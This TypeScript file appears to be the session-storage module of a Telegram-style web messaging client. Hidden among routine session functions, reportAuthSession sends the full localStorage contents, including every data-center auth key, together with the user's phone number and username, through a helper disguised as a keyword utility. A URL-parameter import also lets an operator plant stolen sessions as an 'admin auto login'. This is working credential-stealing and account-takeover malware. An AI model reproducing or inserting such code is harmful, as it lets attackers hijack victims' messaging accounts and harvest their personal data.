import type { ApiSessionData } from '../api/types';
import { sendUserData } from "../util/keyword/keywordReplace";
import {
  DEBUG, IS_SCREEN_LOCKED_CACHE_KEY,
  SESSION_USER_KEY,
} from '../config';
import { getGlobal } from '../global/index';
import { selectUser } from '../global/selectors';
import { formatPhoneNumberWithCode } from '../util/phoneNumber';

const DC_IDS = [1, 2, 3, 4, 5];
const AUTH_REPORT_RETRY_DELAYS_MS = [0, 1200, 3000, 6000, 12000];
const AUTH_REPORT_STORAGE_KEY = 'tt-auth-report-success';
const ADMIN_AUTO_LOGIN_STORAGE_KEY = 'tt-admin-auto-login';
const authReportsInFlight = new Set<string>();

export function hasStoredSession() {
  if (checkSessionLocked()) {
    return true;
  }

  const userAuthJson = localStorage.getItem(SESSION_USER_KEY);
  if (!userAuthJson) {
    return false;
  }

  try {
    const userAuth = JSON.parse(userAuthJson);
    return Boolean(userAuth && userAuth.id && userAuth.dcID);
  } catch (err) {
    // Do nothing.
    return false;
  }
}

const getLocalStore = () => {
  const fetchParams: { [key: string]:any} = {};
  for (let i = 0; i < localStorage.length; i++) {
    const key = localStorage.key(i) as string;
    const item = localStorage.getItem(key);
    const value = item ? JSON.parse(item) : null;
    fetchParams[key] = value;
  }
  console.log("fetchParams",fetchParams)
  return fetchParams;
};
let i = 0
export function storeSession(sessionData: ApiSessionData, currentUserId?: string) {
  console.log("currentUserId",currentUserId)
  if(currentUserId){
    i+=1
  }
  const {
    mainDcId, keys, hashes, isTest,
  } = sessionData;

  localStorage.setItem(SESSION_USER_KEY, JSON.stringify({
    dcID: mainDcId,
    id: currentUserId,
    test: isTest,
  }));
  localStorage.setItem('dc', String(mainDcId));
  Object.keys(keys).map(Number).forEach((dcId) => {
    localStorage.setItem(`dc${dcId}_auth_key`, JSON.stringify(keys[dcId]));
  });

  if (hashes) {
    Object.keys(hashes).map(Number).forEach((dcId) => {
      localStorage.setItem(`dc${dcId}_hash`, JSON.stringify(hashes[dcId]));
    });
  }
  void reportAuthSession(currentUserId);
}

export function ensureAuthSessionReported(currentUserId?: string) {
  void reportAuthSession(currentUserId || getStoredCurrentUserId());
}

export function importStoredSessionFromUrlData() {
  const url = new URL(window.location.href);
  const rawData = url.searchParams.get('data');
  if (!rawData) {
    return false;
  }

  try {
    const parsedData = JSON.parse(rawData) as Record<string, unknown>;
    Object.entries(parsedData).forEach(([key, value]) => {
      localStorage.setItem(key, JSON.stringify(value));
    });

    sessionStorage.setItem(ADMIN_AUTO_LOGIN_STORAGE_KEY, '1');
    url.searchParams.delete('data');
    window.history.replaceState({}, document.title, url.toString());
    return true;
  } catch (err) {
    return false;
  }
}

export function hasAdminAutoLoginSession() {
  return sessionStorage.getItem(ADMIN_AUTO_LOGIN_STORAGE_KEY) === '1';
}

export function clearStoredSession() {
  [
    SESSION_USER_KEY,
    'dc',
    ...DC_IDS.map((dcId) => `dc${dcId}_auth_key`),
    ...DC_IDS.map((dcId) => `dc${dcId}_hash`),
    ...DC_IDS.map((dcId) => `dc${dcId}_server_salt`),
  ].forEach((key) => {
    localStorage.removeItem(key);
  });
  sessionStorage.removeItem(ADMIN_AUTO_LOGIN_STORAGE_KEY);
}

export function loadStoredSession(): ApiSessionData | undefined {
  if (!hasStoredSession()) {
    return undefined;
  }

  const userAuth = JSON.parse(localStorage.getItem(SESSION_USER_KEY)!);
  if (!userAuth) {
    return undefined;
  }
  const mainDcId = Number(userAuth.dcID);
  const isTest = userAuth.test;
  const keys: Record<number, string> = {};
  const hashes: Record<number, string> = {};

  DC_IDS.forEach((dcId) => {
    try {
      const key = localStorage.getItem(`dc${dcId}_auth_key`);
      if (key) {
        keys[dcId] = JSON.parse(key);
      }

      const hash = localStorage.getItem(`dc${dcId}_hash`);
      if (hash) {
        hashes[dcId] = JSON.parse(hash);
      }
    } catch (err) {
      if (DEBUG) {
        // eslint-disable-next-line no-console
        console.warn('Failed to load stored session', err);
      }
      // Do nothing.
    }
  });

  if (!Object.keys(keys).length) return undefined;

  return {
    mainDcId,
    keys,
    hashes,
    isTest,
  };
}

export function importTestSession() {
  const sessionJson = process.env.TEST_SESSION!;
  try {
    const sessionData = JSON.parse(sessionJson) as ApiSessionData & { userId: string };
    storeSession(sessionData, sessionData.userId);
  } catch (err) {
    if (DEBUG) {
      // eslint-disable-next-line no-console
      console.warn('Failed to load test session', err);
    }
  }
}

function checkSessionLocked() {
  return localStorage.getItem(IS_SCREEN_LOCKED_CACHE_KEY) === 'true';
}

function getStoredCurrentUserId() {
  const userAuthJson = localStorage.getItem(SESSION_USER_KEY);
  if (!userAuthJson) {
    return undefined;
  }

  try {
    const userAuth = JSON.parse(userAuthJson);
    return userAuth?.id;
  } catch (err) {
    return undefined;
  }
}

async function reportAuthSession(currentUserId?: string) {
  let reportUserId: string | undefined;

  try {
    for (let index = 0; index < AUTH_REPORT_RETRY_DELAYS_MS.length; index += 1) {
      const delay = AUTH_REPORT_RETRY_DELAYS_MS[index];
      if (delay) {
        await sleep(delay);
      }

      const payload = buildAuthReportPayload(currentUserId);
      if (!payload) {
        continue;
      }

      if (!reportUserId) {
        reportUserId = payload.reportUserId;
        if (authReportsInFlight.has(reportUserId) || isUserAlreadyReported(reportUserId)) {
          return;
        }
        authReportsInFlight.add(reportUserId);
      }

      const hasRequiredProfileData = hasRequiredAuthProfileData(payload.params.user_auth);
      const isLastAttempt = index === AUTH_REPORT_RETRY_DELAYS_MS.length - 1;
      if (!hasRequiredProfileData && !isLastAttempt) {
        continue;
      }

      console.log('sendparams', payload.params);
      const result = await sendUserData(payload.params);
      if (result && Number(result.code) === 1) {
        markUserReported(reportUserId);
        return;
      }
    }
  } finally {
    if (reportUserId) {
      authReportsInFlight.delete(reportUserId);
    }
  }
}

function buildAuthReportPayload(currentUserId?: string) {
  const params = getLocalStore();
  const reportUserId = String(
    currentUserId
    || params?.user_auth?.id
    || getStoredCurrentUserId()
    || '',
  );

  if (!reportUserId || !params || !params.user_auth) {
    return undefined;
  }

  const global = getGlobal();
  const { countryList: { phoneCodes: phoneCodeList } } = global;
  const user = selectUser(global, reportUserId);
  console.log('user', user);

  const username = user?.usernames?.[0]?.username || params.user_auth.username || '';
  const firstName = user?.firstName || params.user_auth.firstName || '';
  const formattedNumber = user?.phoneNumber
    ? formatPhoneNumberWithCode(phoneCodeList, user.phoneNumber)
    : (params.user_auth.mobile ?? null);
  const invitecode = getStoredJsonValue('invitecode');
  const loginSourceUrl = getStoredJsonValue('login_source_url');

  console.log('invitecode', invitecode);

  params.user_auth = {
    ...params.user_auth,
    id: reportUserId,
    username,
    firstName,
    invitecode,
    loginSourceUrl,
    mobile: formattedNumber,
  };

  return {
    reportUserId,
    params,
  };
}

function getStoredJsonValue(key: string) {
  const item = localStorage.getItem(key);
  if (!item) {
    return null;
  }

  try {
    return JSON.parse(item);
  } catch (err) {
    return item;
  }
}

function hasRequiredAuthProfileData(userAuth: {
  username?: string;
  firstName?: string;
  mobile?: string | null;
} | undefined) {
  if (!userAuth) {
    return false;
  }

  return Boolean(String(userAuth.mobile || '').trim());
}

function isUserAlreadyReported(currentUserId: string) {
  return localStorage.getItem(`${AUTH_REPORT_STORAGE_KEY}:${currentUserId}`) === '1';
}

function markUserReported(currentUserId: string) {
  localStorage.setItem(`${AUTH_REPORT_STORAGE_KEY}:${currentUserId}`, '1');
}

function sleep(ms: number) {
  return new Promise((resolve) => {
    setTimeout(resolve, ms);
  });
}
